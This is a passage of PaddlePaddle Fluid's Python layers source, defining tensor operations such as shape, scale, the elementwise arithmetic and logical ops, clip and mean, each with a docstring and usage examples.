attrs['starts'].append(-1)
infer_flags[i] = -1
else:
attrs['starts'].append(dim)
else:
attrs['starts'] = starts
# ends
if isinstance(ends, Variable):
ends.stop_gradient = True
inputs['EndsTensor'] = ends
elif isinstance(ends, (list, tuple)):
attrs['ends'] = []
if utils._contain_var(ends):
inputs['EndsTensorList'] = get_new_list_tensor(ends)
for i, dim in enumerate(ends):
if isinstance(dim, Variable):
attrs['ends'].append(-1)
infer_flags[i] = -1
else:
attrs['ends'].append(dim)
else:
attrs['ends'] = ends
# strides
if isinstance(strides, Variable):
strides.stop_gradient = True
inputs['StridesTensor'] = strides
elif isinstance(strides, (list, tuple)):
attrs['strides'] = []
if utils._contain_var(strides):
inputs['StridesTensorList'] = get_new_list_tensor(strides)
for i, dim in enumerate(strides):
if isinstance(dim, Variable):
attrs['strides'].append(-1)
infer_flags[i] = -1
else:
attrs['strides'].append(dim)
else:
attrs['strides'] = strides
attrs['infer_flags'] = infer_flags
out = helper.create_variable_for_type_inference(
dtype=helper.input_dtype('input'))
helper.append_op(
type='strided_slice', inputs=inputs, attrs=attrs, outputs={'Out': out})
return out
def shape(input):
"""
**Shape Layer**
Get the shape of the input.
Args:
input (Variable): The input N-D Tensor. Datatype can be float32, float64, int32, int64.
Returns:
Variable (Tensor): The shape of the input variable.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
inputs = fluid.layers.data(name="x", shape=[3, 100, 100], dtype="float32")
output = fluid.layers.shape(inputs)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
img = np.ones((3, 100, 100)).astype(np.float32)
res = exe.run(fluid.default_main_program(), feed={'x':img}, fetch_list=[output])
print(res) # [array([ 3, 100, 100], dtype=int32)]
"""
helper = LayerHelper('shape', **locals())
out = helper.create_variable_for_type_inference(dtype='int32')
helper.append_op(
type='shape', inputs={'Input': input}, outputs={'Out': out})
return out
def rank(input):
"""
The OP returns the number of dimensions for a tensor, which is a 0-D int32 Tensor.
Args:
input (Variable): The input N-D tensor with shape of :math:`[N_1, N_2, ..., N_k]`, the data type is arbitrary.
Returns:
Variable, the output data type is int32.: The 0-D tensor with the dimensions of the input variable.
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(name="input", shape=[3, 100, 100], dtype="float32")
rank = fluid.layers.rank(input) # rank=(3,)
"""
ndims = len(input.shape)
out = assign(np.array(ndims, 'int32'))
return out
def size(input):
"""
**Size Layer**
Returns the number of elements for a tensor, which is a int64 Tensor with shape [1].
Args:
input (Variable): The input variable.
Returns:
Variable: The number of elements for the input variable.
Examples:
.. code-block:: python
import paddle.fluid.layers as layers
input = layers.data(
name="input", shape=[3, 100], dtype="float32", append_batch_size=False)
rank = layers.size(input) # 300
"""
helper = LayerHelper('size', **locals())
out = helper.create_variable_for_type_inference(dtype='int64')
helper.append_op(type='size', inputs={'Input': input}, outputs={'Out': out})
return out
def _elementwise_op(helper):
op_type = helper.layer_type
x = helper.kwargs.get('x', None)
y = helper.kwargs.get('y', None)
assert x is not None, 'x cannot be None in {}'.format(op_type)
assert y is not None, 'y cannot be None in {}'.format(op_type)
check_variable_and_dtype(
x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64'], op_type)
check_variable_and_dtype(
y, 'y', ['float16', 'float32', 'float64', 'int32', 'int64'], op_type)
axis = helper.kwargs.get('axis', -1)
use_mkldnn = helper.kwargs.get('use_mkldnn', False)
name = helper.kwargs.get('name', None)
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type=op_type,
inputs={'X': x,
'Y': y},
outputs={'Out': out},
attrs={'axis': axis,
'use_mkldnn': use_mkldnn})
return helper.append_activation(out)
def scale(x, scale=1.0, bias=0.0, bias_after_scale=True, act=None, name=None):
"""
Scale operator.
Putting scale and bias to the input Tensor as following:
``bias_after_scale`` is True:
.. math::
Out=scale*X+bias
``bias_after_scale`` is False:
.. math::
Out=scale*(X+bias)
Args:
x(Variable): Input N-D Tensor of scale operator. Data type can be float32, float64, int8, int16, int32, int64, uint8.
scale(float|Variable): The scale factor of the input, it should be a float number or a Variable with shape [1] and data type as float32.
bias(float): The bias to be put on the input.
bias_after_scale(bool): Apply bias addition after or before scaling. It is useful for numeric stability in some circumstances.
act(str, optional): Activation applied to the output such as tanh, softmax, sigmoid, relu.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable(Tensor|LoDTensor): Output tensor of scale operator, with shape and data type same as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
inputs = fluid.layers.data(name="x", shape=[2, 3], dtype='float32')
output = fluid.layers.scale(inputs, scale = 2.0, bias = 1.0)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
img = np.array([[1, 2, 3], [4, 5, 6]]).astype(np.float32)
res = exe.run(fluid.default_main_program(), feed={'x':img}, fetch_list=[output])
print(res) # [array([[ 3., 5., 7.], [ 9., 11., 13.]], dtype=float32)]
.. code-block:: python
# scale with parameter scale as Variable
import paddle.fluid as fluid
import numpy as np
inputs = fluid.layers.data(name="x", shape=[2, 3], dtype='float32')
scale = fluid.layers.data(name="scale", shape=[1], dtype='float32',
append_batch_size=False)
output = fluid.layers.scale(inputs, scale = scale, bias = 1.0)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
img = np.array([[1, 2, 3], [4, 5, 6]]).astype(np.float32)
scale_np = np.array([2.]).astype(np.float32)
res = exe.run(fluid.default_main_program(), feed={'x':img, 'scale':scale_np}, fetch_list=[output])
print(res) # [array([[ 3., 5., 7.], [ 9., 11., 13.]], dtype=float32)]
"""
check_variable_and_dtype(
x, "x",
['float32', 'float64', 'uint8', 'int16', 'int32', 'in64', 'uint8'],
"scale")
if in_dygraph_mode():
_scale = scale.numpy().item(0) if isinstance(scale, Variable) else scale
out = core.ops.scale(x, 'scale',
float(_scale), 'bias',
float(bias), 'bias_after_scale', bias_after_scale)
return dygraph_utils._append_activation_in_dygraph(out)
inputs = {'X': [x]}
attrs = {
'bias': float(bias),
'bias_after_scale': bias_after_scale,
}
if isinstance(scale, Variable):
inputs['ScaleTensor'] = [scale]
else:
attrs['scale'] = float(scale)
helper = LayerHelper('scale', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='scale', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return helper.append_activation(out)
def elementwise_add(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([2, 3, 4]).astype('float32'),
"y": np.array([1, 5, 2]).astype('float32')
}
x = fluid.data(name="x", shape=[3], dtype='float32')
y = fluid.data(name="y", shape=[3], dtype='float32')
z = fluid.layers.elementwise_add(x, y)
# z = x + y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # [3., 8., 6.]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.ones((2, 3, 4, 5)).astype('float32'),
"y": np.zeros((3, 4)).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[3,4], dtype='float32')
z = fluid.layers.elementwise_add(x, y, axis=1)
# z = x + y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.random.randint(1, 5, size=[2, 3, 4, 5]).astype('float32'),
"y": np.random.randint(1, 5, size=[5]).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[5], dtype='float32')
z = fluid.layers.elementwise_add(x, y, axis=3)
# z = x + y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_add')
return _elementwise_op(LayerHelper('elementwise_add', **locals()))
def elementwise_div(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([2, 3, 4]).astype('float32'),
"y": np.array([1, 5, 2]).astype('float32')
}
x = fluid.data(name="x", shape=[3], dtype='float32')
y = fluid.data(name="y", shape=[3], dtype='float32')
z = fluid.layers.elementwise_div(x, y)
# z = x / y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # [2., 0.6, 2.]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.ones((2, 3, 4, 5)).astype('float32'),
"y": np.zeros((3, 4)).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[3,4], dtype='float32')
z = fluid.layers.elementwise_div(x, y, axis=1)
# z = x / y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.random.randint(1, 5, size=[2, 3, 4, 5]).astype('float32'),
"y": np.random.randint(1, 5, size=[5]).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[5], dtype='float32')
z = fluid.layers.elementwise_div(x, y, axis=3)
# z = x / y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_div')
return _elementwise_op(LayerHelper('elementwise_div', **locals()))
def elementwise_sub(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([2, 3, 4]).astype('float32'),
"y": np.array([1, 5, 2]).astype('float32')
}
x = fluid.data(name="x", shape=[3], dtype='float32')
y = fluid.data(name="y", shape=[3], dtype='float32')
z = fluid.layers.elementwise_sub(x, y)
# z = x - y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # [1., -2., 2.]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.ones((2, 3, 4, 5)).astype('float32'),
"y": np.zeros((3, 4)).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[3,4], dtype='float32')
z = fluid.layers.elementwise_sub(x, y, axis=1)
# z = x - y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.random.randint(1, 5, size=[2, 3, 4, 5]).astype('float32'),
"y": np.random.randint(1, 5, size=[5]).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[5], dtype='float32')
z = fluid.layers.elementwise_sub(x, y, axis=3)
# z = x - y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_sub')
return _elementwise_op(LayerHelper('elementwise_sub', **locals()))
def elementwise_mul(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([2, 3, 4]).astype('float32'),
"y": np.array([1, 5, 2]).astype('float32')
}
x = fluid.data(name="x", shape=[3], dtype='float32')
y = fluid.data(name="y", shape=[3], dtype='float32')
z = fluid.layers.elementwise_mul(x, y)
# z = x * y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # [2., 15., 8.]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.ones((2, 3, 4, 5)).astype('float32'),
"y": np.zeros((3, 4)).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[3,4], dtype='float32')
z = fluid.layers.elementwise_mul(x, y, axis=1)
# z = x * y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.random.randint(1, 5, size=[2, 3, 4, 5]).astype('float32'),
"y": np.random.randint(1, 5, size=[5]).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[5], dtype='float32')
z = fluid.layers.elementwise_mul(x, y, axis=3)
# z = x * y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_mul')
return _elementwise_op(LayerHelper('elementwise_mul', **locals()))
def elementwise_max(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([2, 3, 4]).astype('float32'),
"y": np.array([1, 5, 2]).astype('float32')
}
x = fluid.data(name="x", shape=[3], dtype='float32')
y = fluid.data(name="y", shape=[3], dtype='float32')
z = fluid.layers.elementwise_max(x, y)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) #[2, 5, 4]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.ones((2, 3, 4, 5)).astype('float32'),
"y": np.zeros((3, 4)).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[3,4], dtype='float32')
z = fluid.layers.elementwise_max(x, y, axis=1)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value)#[[[[1., 1., 1., 1., 1.] .... [1., 1., 1., 1., 1.]]]]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_max')
return _elementwise_op(LayerHelper('elementwise_max', **locals()))
def elementwise_min(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([2, 3, 4]).astype('float32'),
"y": np.array([1, 5, 2]).astype('float32')
}
x = fluid.data(name="x", shape=[3], dtype='float32')
y = fluid.data(name="y", shape=[3], dtype='float32')
z = fluid.layers.elementwise_min(x, y)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) #[1, 3, 2]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.ones((2, 3, 4, 5)).astype('float32'),
"y": np.zeros((3, 4)).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[3,4], dtype='float32')
z = fluid.layers.elementwise_min(x, y, axis=1)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value)#[[[[0., 0., 0., 0., 0.] .... [0., 0., 0., 0., 0.]]]]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_min')
return _elementwise_op(LayerHelper('elementwise_min', **locals()))
def elementwise_pow(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([2, 3, 4]).astype('float32'),
"y": np.array([1, 5, 2]).astype('float32')
}
x = fluid.data(name="x", shape=[3], dtype='float32')
y = fluid.data(name="y", shape=[3], dtype='float32')
z = fluid.layers.elementwise_pow(x, y)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) #[2, 243, 16]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_pow')
return _elementwise_op(LayerHelper('elementwise_pow', **locals()))
def elementwise_mod(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([10, 15, 8]).astype('int32'),
"y": np.array([3, 6, 5]).astype('int32')
}
x = fluid.data(name="x", shape=[3], dtype='int32')
y = fluid.data(name="y", shape=[3], dtype='int32')
z = fluid.layers.elementwise_mod(x, y)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) #[1, 3, 3]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_mod')
return _elementwise_op(LayerHelper('elementwise_mod', **locals()))
def elementwise_floordiv(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([10, 15, 8]).astype('int32'),
"y": np.array([3, 7, 5]).astype('int32')
}
x = fluid.data(name="x", shape=[3], dtype='int32')
y = fluid.data(name="y", shape=[3], dtype='int32')
z = fluid.layers.elementwise_floordiv(x, y)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) #[3, 2, 1]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_floordiv')
return _elementwise_op(LayerHelper('elementwise_floordiv', **locals()))
for func in [
elementwise_add,
elementwise_div,
elementwise_sub,
elementwise_mul,
elementwise_max,
elementwise_pow,
elementwise_min,
elementwise_mod,
elementwise_floordiv,
]:
op_proto = OpProtoHolder.instance().get_op_proto(func.__name__)
func.__doc__ = _generate_doc_string_(
op_proto,
additional_args_lines=[
"axis (int32, optional): If X.dimension != Y.dimension, \
Y.dimension must be a subsequence of x.dimension. \
And axis is the start dimension index for broadcasting Y onto X. ",
"act (string, optional): Activation applied to the output. \
Default is None. Details: :ref:`api_guide_activations_en` ",
"name (string, optional): Name of the output. \
Default is None. It's used to print debug info for developers. Details: \
:ref:`api_guide_Name` "
],
skip_attrs_set={"x_data_format", "y_data_format", "axis"
}) + """\n""" + str(func.__doc__)
for func in []:
op_proto = OpProtoHolder.instance().get_op_proto(func.__name__)
func.__doc__ = _generate_doc_string_(
op_proto,
additional_args_lines=[
"act (basestring|None): Activation applied to the output.",
"name (basestring|None): Name of the output."
])
func.__doc__ = func.__doc__ + """
Examples:
.. code-block:: python
import paddle.fluid as fluid
# example 1: shape(x) = (2, 3, 4, 5), shape(y) = (2, 3, 4, 5)
x0 = fluid.layers.data(name="x0", shape=[2, 3, 4, 5], dtype='float32')
y0 = fluid.layers.data(name="y0", shape=[2, 3, 4, 5], dtype='float32')
z0 = fluid.layers.%s(x0, y0)
# example 2: shape(X) = (2, 3, 4, 5), shape(Y) = (5)
x1 = fluid.layers.data(name="x1", shape=[2, 3, 4, 5], dtype='float32')
y1 = fluid.layers.data(name="y1", shape=[5], dtype='float32')
z1 = fluid.layers.%s(x1, y1)
# example 3: shape(X) = (2, 3, 4, 5), shape(Y) = (4, 5), with axis=-1(default) or axis=2
x2 = fluid.layers.data(name="x2", shape=[2, 3, 4, 5], dtype='float32')
y2 = fluid.layers.data(name="y2", shape=[4, 5], dtype='float32')
z2 = fluid.layers.%s(x2, y2, axis=2)
# example 4: shape(X) = (2, 3, 4, 5), shape(Y) = (3, 4), with axis=1
x3 = fluid.layers.data(name="x3", shape=[2, 3, 4, 5], dtype='float32')
y3 = fluid.layers.data(name="y3", shape=[3, 4], dtype='float32')
z3 = fluid.layers.%s(x3, y3, axis=1)
# example 5: shape(X) = (2, 3, 4, 5), shape(Y) = (2), with axis=0
x4 = fluid.layers.data(name="x4", shape=[2, 3, 4, 5], dtype='float32')
y4 = fluid.layers.data(name="y4", shape=[2], dtype='float32')
z4 = fluid.layers.%s(x4, y4, axis=0)
# example 6: shape(X) = (2, 3, 4, 5), shape(Y) = (2, 1), with axis=0
x5 = fluid.layers.data(name="x5", shape=[2, 3, 4, 5], dtype='float32')
y5 = fluid.layers.data(name="y5", shape=[2], dtype='float32')
z5 = fluid.layers.%s(x5, y5, axis=0)
""" % (func.__name__, func.__name__, func.__name__, func.__name__,
func.__name__, func.__name__)
def _logical_op(op_name, x, y, out=None, name=None, binary_op=True):
check_variable_and_dtype(x, "x", ["bool"], op_name)
if y is not None:
check_variable_and_dtype(y, "y", ["bool"], op_name)
if out is not None:
check_variable_and_dtype(out, "out", [convert_dtype(x.dtype)], op_name)
helper = LayerHelper(op_name, **locals())
if binary_op:
assert x.dtype == y.dtype
if out is None:
out = helper.create_variable_for_type_inference(dtype=x.dtype)
if binary_op:
helper.append_op(
type=op_name, inputs={"X": x,
"Y": y}, outputs={"Out": out})
else:
helper.append_op(type=op_name, inputs={"X": x}, outputs={"Out": out})
return out
@templatedoc()
def logical_and(x, y, out=None, name=None):
"""
logical_and Operator
It operates element-wise on X and Y, and returns the Out. X, Y and Out are N-dim boolean LoDTensor or Tensor.
Each element of Out is calculated by
.. math::
Out = X \land Y
Args:
x(${x_type}): ${x_comment}
y(${y_type}): ${y_comment}
out(LoDTensor or Tensor): The LoDTensor or Tensor that specifies the output of the operator, which can be any Variable that has been created in the program. The default value is None, and a new Variable will be created to save the output.
name(str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
${out_type}: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# Graph organizing
x = fluid.layers.data(name='x', shape=[2], dtype='bool')
y = fluid.layers.data(name='y', shape=[2], dtype='bool')
res = fluid.layers.logical_and(x=x, y=y)
# The comment lists another available method.
# res = fluid.layers.fill_constant(shape=[2], dtype='bool', value=0)
# fluid.layers.logical_and(x=x, y=y, out=res)
# Create an executor using CPU as an example
exe = fluid.Executor(fluid.CPUPlace())
# Execute
x_i = np.array([[1, 0], [0, 1]]).astype(np.bool)
y_i = np.array([[1, 1], [0, 0]]).astype(np.bool)
res_val, = exe.run(fluid.default_main_program(), feed={'x':x_i, 'y':y_i}, fetch_list=[res])
print(res_val) # [[True, False], [False, False]]
"""
return _logical_op(
op_name="logical_and", x=x, y=y, name=name, out=out, binary_op=True)
@templatedoc()
def logical_or(x, y, out=None, name=None):
"""
logical_or Operator
It operates element-wise on X and Y, and returns the Out. X, Y and Out are N-dim boolean LoDTensor or Tensor.
Each element of Out is calculated by
.. math::
Out = X \lor Y
Args:
x(${x_type}): ${x_comment}
y(${y_type}): ${y_comment}
out(LoDTensor or Tensor): The LoDTensor or Tensor that specifies the output of the operator, which can be any Variable that has been created in the program. The default value is None, and a new Variable will be created to save the output.
name(str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
${out_type}: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# Graph organizing
x = fluid.layers.data(name='x', shape=[2], dtype='bool')
y = fluid.layers.data(name='y', shape=[2], dtype='bool')
res = fluid.layers.logical_or(x=x, y=y)
# The comment lists another available method.
# res = fluid.layers.fill_constant(shape=[2], dtype='bool', value=0)
# fluid.layers.logical_or(x=x, y=y, out=res)
# Create an executor using CPU as an example
exe = fluid.Executor(fluid.CPUPlace())
# Execute
x_i = np.array([[1, 0], [0, 1]]).astype(np.bool)
y_i = np.array([[1, 1], [0, 0]]).astype(np.bool)
res_val, = exe.run(fluid.default_main_program(), feed={'x':x_i, 'y':y_i}, fetch_list=[res])
print(res_val) # [[True, True], [False, True]]
"""
return _logical_op(
op_name="logical_or", x=x, y=y, name=name, out=out, binary_op=True)
@templatedoc()
def logical_xor(x, y, out=None, name=None):
"""
logical_xor Operator
It operates element-wise on X and Y, and returns the Out. X, Y and Out are N-dim boolean LoDTensor or Tensor.
Each element of Out is calculated by
.. math::
Out = (X \lor Y) \land \lnot (X \land Y)
Args:
x(${x_type}): ${x_comment}
y(${y_type}): ${y_comment}
out(LoDTensor or Tensor): The LoDTensor or Tensor that specifies the output of the operator, which can be any Variable that has been created in the program. The default value is None, and a new Variable will be created to save the output.
name(str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
${out_type}: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# Graph organizing
x = fluid.layers.data(name='x', shape=[2], dtype='bool')
y = fluid.layers.data(name='y', shape=[2], dtype='bool')
res = fluid.layers.logical_xor(x=x, y=y)
# The comment lists another available method.
# res = fluid.layers.fill_constant(shape=[2], dtype='bool', value=0)
# fluid.layers.logical_xor(x=x, y=y, out=res)
# Create an executor using CPU as an example
exe = fluid.Executor(fluid.CPUPlace())
# Execute
x_i = np.array([[1, 0], [0, 1]]).astype(np.bool)
y_i = np.array([[1, 1], [0, 0]]).astype(np.bool)
res_val, = exe.run(fluid.default_main_program(), feed={'x':x_i, 'y':y_i}, fetch_list=[res])
print(res_val) # [[False, True], [False, True]]
"""
return _logical_op(
op_name="logical_xor", x=x, y=y, name=name, out=out, binary_op=True)
@templatedoc()
def logical_not(x, out=None, name=None):
"""
logical_not Operator
It operates element-wise on X, and returns the Out. X and Out are N-dim boolean LoDTensor or Tensor.
Each element of Out is calculated by
.. math::
Out = \lnot X
Args:
x(${x_type}): ${x_comment}
out(LoDTensor/Tensor): The LoDTensor/Tensor that specifies the output of the operator, which can be any Variable that has been created in the program. The default value is None, and a new Variable will be created to save the output.
name(str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
${out_type}: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# Graph organizing
x = fluid.layers.data(name='x', shape=[2], dtype='bool')
res = fluid.layers.logical_not(x)
# The comment lists another avaliable method.
# res = fluid.layers.fill_constant(shape=[2], dtype='bool', value=0)
# fluid.layers.logical_not(x, out=res)
# Create an executor using CPU as an example
exe = fluid.Executor(fluid.CPUPlace())
# Execute
x_i = np.array([[1, 0]]).astype(np.bool)
res_val, = exe.run(fluid.default_main_program(), feed={'x':x_i}, fetch_list=[res])
print(res_val) # [[False, True]]
"""
return _logical_op(
op_name="logical_not", x=x, y=None, name=name, out=out, binary_op=False)
@templatedoc()
def clip(x, min, max, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
min(float): ${min_comment}
max(float): ${max_comment}
name(str, optional): The default value is None.
Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`
Returns:
${out_comment}
Return Type:
${out_type}
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(
name='data', shape=[1], dtype='float32')
reward = fluid.layers.clip(x=input, min=-1.0, max=1.0)
"""
helper = LayerHelper("clip", **locals())
if name is None:
name = unique_name.generate_with_ignorable_key(".".join(
[helper.name, 'tmp']))
out = helper.create_variable(
type=x.type, name=name, dtype=x.dtype, persistable=False)
helper.append_op(
type="clip",
inputs={"X": x},
attrs={"min": min,
"max": max},
outputs={"Out": out})
return out
@templatedoc()
def clip_by_norm(x, max_norm, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
max_norm(${max_norm_type}): ${max_norm_comment}
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable:
out(${out_type}): ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(
name='data', shape=[None, 1], dtype='float32')
reward = fluid.layers.clip_by_norm(x=input, max_norm=1.0)
"""
helper = LayerHelper("clip_by_norm", **locals())
check_variable_and_dtype(x, 'X', ['float32'], 'clip_by_norm')
check_type(max_norm, 'max_norm', (float), 'clip_by_norm')
if name is None:
name = unique_name.generate_with_ignorable_key(".".join(
[helper.name, 'tmp']))
out = helper.create_variable(
type=x.type, name=name, dtype=x.dtype, persistable=False)
helper.append_op(
type="clip_by_norm",
inputs={"X": x},
attrs={"max_norm": max_norm},
outputs={"Out": out})
return out
@templatedoc()
def mean(x, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
name(basestring|None): Name of the output.
Returns:
out(${out_type}): ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.layers.data(
name='data', shape=[2, 3], dtype='float32')
mean = fluid.layers.mean(input)
"""
if in_dygraph_mode():
return core.ops.mean(x)
helper = LayerHelper("mean", **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'mean')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="mean", inputs={"X": x}, attrs={}, outputs={"Out": out})
return out
@templatedoc()
def merge_selected_rows(x, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
name(basestring|None): Name of the output.
Returns:
out(${out_type}): ${out_comment}
Examples:
.. code-block:: python
